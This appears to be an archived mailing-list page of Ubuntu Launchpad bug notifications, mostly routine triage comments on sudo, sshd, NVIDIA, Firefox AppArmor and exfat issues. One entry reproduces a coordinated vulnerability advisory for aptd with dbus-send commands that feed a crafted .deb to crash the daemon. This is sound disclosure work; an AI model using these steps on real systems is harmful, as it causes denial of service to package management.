name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/#268898190" pid=19173 comm="vlc" 
requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:28 coal kernel: [ 8001.422481] audit: type=1400 
audit(1524581428.210:1951): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" 
name="/home/thresh/snap/vlc/288/.local/share/user-places.xbel" pid=19173 
comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/home/thresh/snap/vlc/288/.local/share/#268898190"
  Apr 24 17:50:28 coal kernel: [ 8001.556305] audit: type=1400 
audit(1524581428.342:1952): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/run/user/1000/snap.vlc/#511744" pid=19173 comm="vlc" requested_mask="l" 
denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:28 coal kernel: [ 8001.556318] audit: type=1400 
audit(1524581428.342:1953): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" name="/run/user/1000/snap.vlc/vlcxkYxzT.1.slave-socket" 
pid=19173 comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/run/user/1000/snap.vlc/#511744"
  Apr 24 17:50:28 coal kernel: [ 8001.556324] audit: type=1400 
audit(1524581428.342:1954): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/run/user/1000/snap.vlc/#511744" pid=19173 comm="vlc" requested_mask="l" 
denied_mask="l" fsuid=1000 ouid=1000
  Apr 24 17:50:28 coal kernel: [ 8001.556332] audit: type=1400 
audit(1524581428.342:1955): apparmor="DENIED" operation="link" 
profile="snap.vlc.vlc" name="/run/user/1000/snap.vlc/vlcbTrpmK.1.slave-socket" 
pid=19173 comm="vlc" requested_mask="l" denied_mask="l" fsuid=1000 ouid=1000 
target="/run/user/1000/snap.vlc/#511744"
  Apr 24 17:50:28 coal kernel: [ 8001.556338] audit: type=1400 
audit(1524581428.342:1956): apparmor="DENIED" operation="link" info="Failed 
name lookup - deleted entry" error=-2 profile="snap.vlc.vlc" 
name="/run/user/1000/snap.vlc/#511744" pid=19173 comm="vlc" 

[Touch-packages] [Bug 1899193] Re: local denial of service due to parsing bugs in arfile.cc

2021-02-26 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/1899193

Title:
  local denial of service due to parsing bugs in arfile.cc

Status in apt package in Ubuntu:
  Fix Released
Status in aptdaemon package in Ubuntu:
  Fix Released
Status in python-apt package in Ubuntu:
  Fix Released

Bug description:
  # GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2020-168`,
  `GHSL-2020-169`, `GHSL-2020-170`

  The [GitHub Security Lab](https://securitylab.github.com) team has
  identified potential security vulnerabilities in aptd.

  We are committed to working with you to help resolve these issues. In
  this report you will find everything you need to effectively
  coordinate a resolution of these issues with the GHSL team.

  If at any point you have concerns or questions about this process,
  please do not hesitate to reach out to us at `security...@github.com`
  (please include `GHSL-2020-168`, `GHSL-2020-169`, or `GHSL-2020-170`
  as a reference).

  If you are _NOT_ the correct point of contact for this report, please
  let us know!

  ## Summary

  The aptd daemon is a system service for installing and updating
  packages. It is accessible via
  [dbus](https://www.freedesktop.org/wiki/Software/dbus/) and has a
  method named "InstallFile" which is used for installing local `.deb`
  packages. Although polkit is used to prevent an unprivileged user from
  using "InstallFile" to install a malicious `.deb` package, it does not
  prevent aptd from parsing the contents of the `.deb` file. The parsing
  logic is provided by two packages, [libapt-pkg-
  dev](https://packages.ubuntu.com/focal/libapt-pkg-dev) and [python-
  apt](https://packages.ubuntu.com/source/focal/python-apt), and is
  implemented in C. These two packages contain several bugs, which an
  unprivileged user can exploit to trigger a local denial of service
  attack.

  ## Product

  aptd

  ## Tested Version

  * libapt-pkg-dev: version 2.0.2ubuntu0.1
  * python-apt: 2.0.0ubuntu0.20.04.1
  * Tested on Ubuntu 20.04.1 LTS

  ## Details

  ### Issue 1: aptd crash due to integer overflow in arfile.cc
  (GHSL-2020-168)

  A crafted `.deb` package can trigger a negative integer overflow at
  [arfile.cc, line
  116](https://git.launchpad.net/ubuntu/+source/apt/tree/apt-
  pkg/contrib/arfile.cc?h=applied/ubuntu/focal-
  updates=4c264e60b524855b211751e1632ba48526f6b44d#n116):

  ```c
  Memb->Size -= Len;
  ```

  Due to the integer overflow, the value of `Memb->Size` is
  `0x`. This leads to an out-of-memory error at
  [arfile.cc, line 602](https://git.launchpad.net/ubuntu/+source/python-
  apt/tree/python/arfile.cc?h=applied/ubuntu/focal-
  updates=0f7cc93acdb51d943114f1cd79002288c4ca4d24#n602):

  ```c
  char* value = new char[member->Size];
  ```

  The out-of-memory error causes aptd to crash.

  Please note that the source locations above refer to two separate
  files, both named `arfile.cc`. The first is from the libapt-pkg-dev
  package and the second is from the python-apt package.

  To trigger the crash, first use the attached source file named
  "createdeb.c" to generate the malicious `.deb` file:

  ```bash
  gcc createdeb.c -o createdeb
  ./createdeb crash test.deb
  ```

  Now use `dbus-send` to send the malicious `.deb` file to aptd:

  ```bash
  $ dbus-send --system --type="method_call" --print-reply --dest=org.debian.apt 
/org/debian/apt org.debian.apt.InstallFile string:`realpath test.deb` 
boolean:true
  method return time=1602245339.731762 sender=:1.287 -> destination=:1.288 
serial=8 reply_serial=2
 string "/org/debian/apt/transaction/90f29de930854568964af1918f6ca5eb"
  $ dbus-send --system --type="method_call" --print-reply --dest=org.debian.apt 
/org/debian/apt/transaction/90f29de930854568964af1918f6ca5eb 
org.debian.apt.transaction.Run
  ```

  Note that you need to use the "transaction id" returned by the first
  `dbus-send` in the second `dbus-send` command.

   Impact

  This issue may lead to local denial of service.

   Resources

  I have attached `createdeb.c`, which can be used to generate the
  malicious `.deb` file.

  ### Issue 2: aptd infinite loop due to integer overflow in arfile.cc
  (GHSL-2020-169)

  This issue is very similar to issue 1, but is caused by a different
  bug. This bug occurs during the call to `StrToNum` at [arfile.cc, line
  92](https://git.launchpad.net/ubuntu/+source/apt/tree/apt-
  pkg/contrib/arfile.cc?h=applied/ubuntu/focal-
  updates=4c264e60b524855b211751e1632ba48526f6b44d#n92):

  ```c
  StrToNum(Head.Size,Memb->Size,sizeof(Head.Size)) == false)
  ```

  The bug is due to the use of `strtoul` in
  [StrToNum](https://git.launchpad.net/ubuntu/+source/apt/tree/apt-
  pkg/contrib/strutl.cc?h=applied/ubuntu/focal-
  updates=4c264e60b524855b211751e1632ba48526f6b44d#n1169):

  ```c
  

[Touch-packages] [Bug 1915945] Re: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed sudo package post-installation script subprocess returned error exit status 1

2021-02-23 Thread Seth Arnold
What's the output of:

lsattr -l /etc/sudoers

Please note that the sudoers file should only ever be edited with
visudo, which will perform safety checks on the file when you try to
save it.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1915945

Title:
  package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed
  sudo package post-installation script subprocess returned error exit
  status 1

Status in sudo package in Ubuntu:
  Incomplete

Bug description:
  I've put the system to upgrade and this error occured!!

  I tried many ways to correct it but all attempts were unsuccesfull.

  Best regards,

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: sudo 1.8.31-1ubuntu1.2
  ProcVersionSignature: Ubuntu 5.4.0-65.73-generic 5.4.78
  Uname: Linux 5.4.0-65-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.16
  AptOrdering:
   software-properties-common:amd64: Install
   software-properties-gtk:amd64: Install
   python3-software-properties:amd64: Install
   NULL: ConfigurePending
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Feb 17 13:43:57 2021
  DuplicateSignature:
   package:sudo:1.8.31-1ubuntu1.2
   Setting up sudo (1.8.31-1ubuntu1.2) ...
   chown: alterando o dono de '/etc/sudoers': Operação não permitida
   dpkg: error processing package sudo (--configure):
installed sudo package post-installation script subprocess returned error 
exit status 1
  ErrorMessage: installed sudo package post-installation script subprocess 
returned error exit status 1
  InstallationDate: Installed on 2018-12-12 (797 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: sudo
  Title: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed 
sudo package post-installation script subprocess returned error exit status 1
  UpgradeStatus: Upgraded to focal on 2020-09-30 (139 days ago)
  VisudoCheck:
   /etc/sudoers: análise OK
   /etc/sudoers.d/README: análise OK
  mtime.conffile..etc.sudoers: 2020-12-30T18:27:17.782421

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/1915945/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1916256] Re: NVIDIA Driver not working

2021-02-19 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1916256

Title:
  NVIDIA Driver not working

Status in xorg package in Ubuntu:
  New

Bug description:
  hello so i have a issue with NVIDIA driver on a 4k res the system is laggy 1 
frame per sec and 
  it shows me a glitch when i move the taps 

  like : https://imgur.com/3LWJbbC

  thanks in advance

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: xorg 1:7.7+19ubuntu14
  ProcVersionSignature: Ubuntu 5.8.0-43.49~20.04.1-generic 5.8.18
  Uname: Linux 5.8.0-43-generic x86_64
  NonfreeKernelModules: nvidia_modeset nvidia
  .proc.driver.nvidia.capabilities.gpu0: Error: [Errno 21] Is a directory: 
'/proc/driver/nvidia/capabilities/gpu0'
  .proc.driver.nvidia.capabilities.mig: Error: [Errno 21] Is a directory: 
'/proc/driver/nvidia/capabilities/mig'
  .proc.driver.nvidia.gpus..01.00.0: Error: [Errno 21] Is a directory: 
'/proc/driver/nvidia/gpus/:01:00.0'
  .proc.driver.nvidia.registry: Binary: ""
  .proc.driver.nvidia.suspend: suspend hibernate resume
  .proc.driver.nvidia.suspend_depth: default modeset uvm
  .proc.driver.nvidia.version:
   NVRM version: NVIDIA UNIX x86_64 Kernel Module  460.32.03  Sun Dec 27 
19:00:34 UTC 2020
   GCC version:
  ApportVersion: 2.20.11-0ubuntu27.16
  Architecture: amd64
  BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log'
  CasperMD5CheckResult: skip
  CompositorRunning: None
  CurrentDesktop: ubuntu:GNOME
  Date: Fri Feb 19 09:30:48 2021
  DistUpgraded: Fresh install
  DistroCodename: focal
  DistroVariant: ubuntu
  ExtraDebuggingInterest: Yes, if not too technical
  GraphicsCard:
   Intel Corporation Skylake GT2 [HD Graphics 520] [8086:1916] (rev 07) 
(prog-if 00 [VGA controller])
 Subsystem: Hewlett-Packard Company Skylake GT2 [HD Graphics 520] 
[103c:80e5]
 Subsystem: Hewlett-Packard Company GM107M [GeForce GTX 950M] [103c:80e5]
  InstallationDate: Installed on 2021-02-19 (0 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 
(20210209.1)
  MachineType: HP HP ENVY Notebook
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.8.0-43-generic 
root=UUID=d6d44f80-a9fe-4951-b886-8035f1017eff ro quiet splash vt.handoff=7
  SourcePackage: xorg
  Symptom: display
  UpgradeStatus: No upgrade log present (probably fresh install)
  acpidump: Error: command ['pkexec', '/usr/share/apport/dump_acpi_tables.py'] 
failed with exit code 126: Error executing command as another user: Request 
dismissed
  dmi.bios.date: 03/04/2016
  dmi.bios.release: 15.53
  dmi.bios.vendor: Insyde
  dmi.bios.version: F.35
  dmi.board.asset.tag: Type2 - Board Asset Tag
  dmi.board.name: 80E5
  dmi.board.vendor: HP
  dmi.board.version: 87.60
  dmi.chassis.asset.tag: Chassis Asset Tag
  dmi.chassis.type: 10
  dmi.chassis.vendor: HP
  dmi.chassis.version: Chassis Version
  dmi.ec.firmware.release: 87.60
  dmi.modalias: 
dmi:bvnInsyde:bvrF.35:bd03/04/2016:br15.53:efr87.60:svnHP:pnHPENVYNotebook:pvrType1ProductConfigId:rvnHP:rn80E5:rvr87.60:cvnHP:ct10:cvrChassisVersion:
  dmi.product.family: 103C_5335KV G=N L=CON B=HP S=ENV
  dmi.product.name: HP ENVY Notebook
  dmi.product.sku: V8S44EA#A2N
  dmi.product.version: Type1ProductConfigId
  dmi.sys.vendor: HP
  version.compiz: compiz N/A
  version.libdrm2: libdrm2 2.4.102-1ubuntu1~20.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 20.2.6-0ubuntu0.20.04.1
  version.libgl1-mesa-glx: libgl1-mesa-glx N/A
  version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A
  version.xserver-xorg-core: xserver-xorg-core 2:1.20.9-2ubuntu1.2~20.04.1
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-1
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20200226-1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.16-1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1916256/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1915945] Re: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed sudo package post-installation script subprocess returned error exit status 1

2021-02-17 Thread Seth Arnold
Hello,

chown: alterando o dono de '/etc/sudoers': Operação não permitida

Is there any chance you've set attrs on this file to prevent it from
being modified?

THanks

** Changed in: sudo (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1915945

Title:
  package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed
  sudo package post-installation script subprocess returned error exit
  status 1

Status in sudo package in Ubuntu:
  Incomplete

Bug description:
  I've put the system to upgrade and this error occured!!

  I tried many ways to correct it but all attempts were unsuccesfull.

  Best regards,

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: sudo 1.8.31-1ubuntu1.2
  ProcVersionSignature: Ubuntu 5.4.0-65.73-generic 5.4.78
  Uname: Linux 5.4.0-65-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.16
  AptOrdering:
   software-properties-common:amd64: Install
   software-properties-gtk:amd64: Install
   python3-software-properties:amd64: Install
   NULL: ConfigurePending
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Feb 17 13:43:57 2021
  DuplicateSignature:
   package:sudo:1.8.31-1ubuntu1.2
   Setting up sudo (1.8.31-1ubuntu1.2) ...
   chown: alterando o dono de '/etc/sudoers': Operação não permitida
   dpkg: error processing package sudo (--configure):
installed sudo package post-installation script subprocess returned error 
exit status 1
  ErrorMessage: installed sudo package post-installation script subprocess 
returned error exit status 1
  InstallationDate: Installed on 2018-12-12 (797 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: sudo
  Title: package sudo 1.8.31-1ubuntu1.2 failed to install/upgrade: installed 
sudo package post-installation script subprocess returned error exit status 1
  UpgradeStatus: Upgraded to focal on 2020-09-30 (139 days ago)
  VisudoCheck:
   /etc/sudoers: análise OK
   /etc/sudoers.d/README: análise OK
  mtime.conffile..etc.sudoers: 2020-12-30T18:27:17.782421

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/1915945/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1878194] Re: [Sennheiser HD 4.50 BTNC] Bluetooth headset not working when selecting HSP/HFP audio profile in Focal Fossa

2021-02-17 Thread Seth Arnold
*** This bug is a duplicate of bug 1871794 ***
https://bugs.launchpad.net/bugs/1871794

** Information type changed from Public Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1878194

Title:
  [Sennheiser HD 4.50 BTNC] Bluetooth headset not working when selecting
  HSP/HFP audio profile in Focal Fossa

Status in bluez package in Ubuntu:
  Confirmed
Status in pulseaudio package in Ubuntu:
  Confirmed

Bug description:
  After updating the release from Ubuntu 19.10 to 20.04, the bluetooth
  headset doesn't work anymore when HSP/HFP profile is selected.

  With Ubuntu 19.10 the headset was working, there was audio and the mic
  was perfect for video conferencing.

  [Steps to reproduce]
  1. Connect headset (used blueman to setup and connect)
  1.1. When connected the system automatically selects A2DP profile
  2. Start playing audio (browser or other)
  3. Change profile to HSP/HFP with pavucontrol (or blueman)
  4. The audio disappears and microphone is not working (no input)
  5. Optionally switch back to A2DP and the audio comes back

  [Expected]
  When switching to HSP/HFP the audio should keep playing and the microphone 
should start working

  [Notes]
  I tried with pavucontrol to switch between profiles while playing audio from 
a browser.
  As side note there's a led in the headset that still blinks when switching 
profile.

  I tried deleting the pulse folder under user's profile .config without
  success, also reinstalled packages and did a `sudo alsa force-reload`
  and rebooting several times.

  Note: not sure this is a duplicate of [Bug #1576559], it looks quite
  different since the profile changes but the headset stops working.

  [System info]
  Ubuntu: 20.04 - Linux 5.4.0-29-generic x86_64
  pulseaudio: 1:13.99.1-1ubuntu3
  bluez: 5.53-0ubuntu3

  Headset: Sennheiser HD 4.50 BTNC

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1878194/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1915913] Re: OpenSSL Multiple Denial of Service Vulnerabilities

2021-02-17 Thread Seth Arnold
Hello, there are untested packages in https://launchpad.net/~ubuntu-
security-proposed/+archive/ubuntu/ppa/+packages in case you wish to test
them in your environment.

Thanks

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1915913

Title:
  OpenSSL Multiple Denial of Service Vulnerabilities

Status in openssl package in Ubuntu:
  New

Bug description:
  Multiple vulnerabilities have been reported in OpenSSL, which can be
  exploited by malicious people to cause a DoS (Denial of Service).

  1

  An error related to the "X509_issuer_and_serial_hash()" function
  (crypto/x509/x509_cmp.c) can be exploited to trigger a NULL pointer
  dereference and subsequently cause a crash.

  2

  An integer overflow error related to CipherUpdate calls can be
  exploited to cause a crash.

  The vulnerabilities are reported in versions prior to 1.1.1j and prior
  to 1.0.2y.

  Affected Software

  The following software is affected by the described vulnerability.
  Please check the vendor links below to see if exactly your version is
  affected.

  OpenSSL 1.x

  Solution

  Update to version 1.1.1j or 1.0.2y.

  References

  1. https://www.openssl.org/news/secadv/20210216.txt 

  2. 
https://github.com/openssl/openssl/commit/8130d654d1de922ea224fa18ee3bc7262edc39c0
 

  3. 
https://github.com/openssl/openssl/commit/c9fb704cf3af5524eb8e79961e31b60eee8c3c47
 


  
  Please provide an update.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1915913/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1915908] Re: package openssh-server 1:8.2p1-4ubuntu0.1 failed to install/upgrade: installed openssh-server package post-installation script subprocess returned error exit status

2021-02-17 Thread Seth Arnold
Hello, note this line from the automatically added contents:

 SSHDConfig: Error: command ['/usr/sbin/sshd', '-T'] failed with exit
code 255: /etc/ssh/sshd_config line 1: garbage at end of line; "to".

It looks like your /etc/ssh/sshd_config file may be incorrect.

Thanks

** Changed in: openssh (Ubuntu)
   Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1915908

Title:
  package openssh-server 1:8.2p1-4ubuntu0.1 failed to install/upgrade:
  installed openssh-server package post-installation script subprocess
  returned error exit status 1

Status in openssh package in Ubuntu:
  Incomplete

Bug description:
  sh.service - OpenBSD Secure Shell server
   Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: 
enabled)
   Active: activating (auto-restart) (Result: exit-code) since Wed 
2021-02-17 15:42:28 IST; 11ms ago
 Docs: man:sshd(8)
   man:sshd_config(5)
  Process: 24813 ExecStartPre=/usr/sbin/sshd -t (code=exited, 
status=255/EXCEPTION)
  dpkg: error processing package openssh-server (--configure):
   installed openssh-server package post-installation script subprocess 
returned error exit status 1
  Processing triggers for systemd (245.4-4ubuntu3.4) ...
  Processing triggers for man-db (2.9.1-1) ...
  Processing triggers for ufw (0.36-6) ...
  Errors were encountered while processing:
   openssh-server
  E: Sub-process /usr/bin/dpkg returned an error code (1)

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: openssh-server 1:8.2p1-4ubuntu0.1
  ProcVersionSignature: Ubuntu 5.4.0-65.73-generic 5.4.78
  Uname: Linux 5.4.0-65-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.16
  AptOrdering:
   openssh-server:amd64: Install
   NULL: ConfigurePending
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Feb 17 15:42:28 2021
  ErrorMessage: installed openssh-server package post-installation script 
subprocess returned error exit status 1
  InstallationDate: Installed on 2021-01-05 (42 days ago)
  InstallationMedia: Ubuntu 18.04.4 LTS "Bionic Beaver" - Release amd64 
(20200203.1)
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python3.8, Python 3.8.5, python-is-python3, 3.8.2-4
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SSHDConfig: Error: command ['/usr/sbin/sshd', '-T'] failed with exit code 
255: /etc/ssh/sshd_config line 1: garbage at end of line; "to".
  SourcePackage: openssh
  Title: package openssh-server 1:8.2p1-4ubuntu0.1 failed to install/upgrade: 
installed openssh-server package post-installation script subprocess returned 
error exit status 1
  UpgradeStatus: Upgraded to focal on 2021-02-04 (12 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1915908/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1914839] Re: package upgrade should replace /etc/ssl/certs/ca-certificates.crt atomically

2021-02-05 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1914839

Title:
  package upgrade should replace /etc/ssl/certs/ca-certificates.crt
  atomically

Status in ca-certificates package in Ubuntu:
  New

Bug description:
  While upgrading the ca-certificates package, a process got the error:

  SSL_ca_file /etc/ssl/certs/ca-certificates.crt does not exist

  This file should be replaced atomically, with no time gap where the
  file does not exist.

  (I am flagging this as a security vulnerability because, while I did
  not experience any security issue, I can imagine at least the
  possibility of this being exploitable in some way in some
  circumstances.)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ca-certificates/+bug/1914839/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1914279] Re: linux from security may force reboots without complete dkms modules

2021-02-02 Thread Seth Arnold
Re test rebuilds, that's certainly the intention, but there are
occasional problems:

https://launchpad.net/bugs/1910555
https://bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers-340/+bug/1910709
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1910503 (virtualbox, 
probably not in scope)

These three were discussed a bit on https://discourse.ubuntu.com/t
/improvements-for-hardware-support-in-ubuntu-desktop-installation-
media/20606

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apt in Ubuntu.
https://bugs.launchpad.net/bugs/1914279

Title:
  linux from security may force reboots without complete dkms modules

Status in apt package in Ubuntu:
  New
Status in dkms package in Ubuntu:
  New
Status in linux package in Ubuntu:
  Confirmed
Status in linux-meta package in Ubuntu:
  New
Status in unattended-upgrades package in Ubuntu:
  New
Status in update-manager package in Ubuntu:
  New

Bug description:
  Whilst discussing

  https://discourse.ubuntu.com/t/improvements-for-hardware-support-in-
  ubuntu-desktop-installation-media/20606

  We have noticed a reference to somebody not having working backport-
  iwlwifi-dkms, whilst SRU of that happened before the v5.4 -> v5.8
  switch.

  However, kernel meta switch was pushed to security pocket, but the
  dkms modules are all in -updates only.

  This may result in people automatically installing the new kernel with
  unatanded upgrades; dkms modules failing to build; and a reboot
  required flag left on disk.

  At this point launching update manager will not offer to install dkms
  modules from updates, and will guide the users to reboot. which
  will then cause them to boot the new kernel without the dkms modules
  that might be providing networking for them.

  Should dkms modules SRUs always getting published into -security
  pocket, as well as the -updates pocket?

  Should linux maintainer scripts prevent touching reboot required flag
  if any dkms modules fail to build?

  Should apt / unattanded-upgrades / update-manager always update dkms
  modules with kernels?

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1914279/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1914148] Re: Firefox connstantly disabled on Apparmor

2021-02-01 Thread Seth Arnold
The Firefox AppArmor profile isn't enabled by default because it forces
the user to change how they interact with their browser.

Consider that the profile really allows downloads only into ~/Downloads/
directories. (There's other places that are writable, but even less
suitable for downloads.) Many users prefer to download directly to their
existing directory structure.

Consider the wide variety of plugins that may supply helper executables.
Plugins failing without a good interface in the browser to know why they
have failed would be very confusing.

Consider the huge number of applications that people install to handle
mime types. People want to be able to click a link to any random file
and have the browser offer to launch the helper.

People who are fine with all these impositions in how they can use
Firefox can enable the Firefox profile. They'll know how to debug issues
when they arise, and furthermore, probably already have a workflow that
makes it easy to work with the AppArmor policy restrictions.

But most Ubuntu users are completely unaware that they're running
AppArmor on many of their services. Surely some of this group would like
to use it more, if only they knew about it, but also many people just
need their computers to keep working as they always have.

If we enable this one profile, we run the serious risk that users will
disable AppArmor entirely.

Thanks

** Package changed: apparmor (Ubuntu) => firefox (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1914148

Title:
  Firefox connstantly  disabled on Apparmor

Status in firefox package in Ubuntu:
  New

Bug description:
  Once again Apparmor policies are constantly disabled for Firefox. 
  -I've reported this bug in December, then came a patch, then for the last 
month of January -  regardless of updates, Firefox profiles are skipped.
  - You cannot be serious?
  -This is a consistent seccurity issue!
  - Please write rules that consistently work or teach us how to do so / deal 
with Mozilla

  "Feb 02 00:17:24 USER apparmor.systemd[1117]: Skipping profile in 
/etc/apparmor.d/disable: usr.bin.firefox
  Feb 02 00:17:24 USER apparmor.systemd[1118]: Skipping profile in 
/etc/apparmor.d/disable: usr.sbin.rsyslogd
  Feb 02 00:17:24 USER systemd[1]: Finished Load AppArmor profiles.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/firefox/+bug/1914148/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1872504] Re: date modified is wrong for files on an exfat formatted drive

2021-01-22 Thread Seth Arnold
I added the linux source package to this bug because I've heard this
commit addresses the issue:

https://github.com/gregkh/linux/commit/099340d3e758cca06a82bf5dcff8b9a8acbdcb0a

Thanks

** Also affects: linux (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-meta in Ubuntu.
https://bugs.launchpad.net/bugs/1872504

Title:
  date modified is wrong for files on an exfat formatted drive

Status in linux package in Ubuntu:
  New
